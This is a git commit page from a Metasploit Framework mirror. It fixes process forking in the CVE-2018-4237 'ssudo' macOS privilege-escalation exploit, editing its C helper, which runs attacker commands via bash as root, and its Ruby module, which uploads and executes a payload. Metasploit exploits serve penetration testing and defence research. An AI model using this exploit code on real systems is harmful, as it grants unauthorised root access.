infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

fix forking

GSoC/Meterpreter_Web_Console
Tim W 2018-11-20 15:58:55 +08:00
parent 420be60900
commit 44b1b6fe31
3 changed files with 7 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/CVE-2018-4237/ssudo Executable file
View File

Binary file not shown.

9
external/source/exploits/CVE-2018-4237/ssudo/ssudo.c vendored
View File

@ -249,9 +249,12 @@ int main(int argc, char** argv)
// We are being executed by sudo. We now need to restore the original
// bootstrap port and stdin fd and then execute the requested command
restore_bootstrap_port();
dup2(STDOUT_FILENO, STDIN_FILENO);
dup2(STDERR_FILENO, STDOUT_FILENO);
return execl("/bin/bash", "/bin/bash", "-c", argv[1], NULL);
if (!fork()) {
dup2(STDOUT_FILENO, STDIN_FILENO);
dup2(STDERR_FILENO, STDOUT_FILENO);
return execl("/bin/bash", "/bin/bash", "-c", argv[1], NULL);
}
return 0;
}
// Copy command into one string suitable for "bash -c"

2
modules/exploits/osx/local/libxpc_mitm_ssudo.rb
View File

@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Local
upload_executable_file(exploit_file, exploit_data)
payload_file = "#{datastore['WritableDir']}/#{Rex::Text::rand_text_alpha_lower(6..12)}"
upload_executable_file(payload_file, generate_payload_exe)
exploit_cmd = "#{exploit_file} #{payload_file} &"
exploit_cmd = "#{exploit_file} #{payload_file}"
print_status("Executing cmd '#{exploit_cmd}'")
cmd_exec(exploit_cmd)
end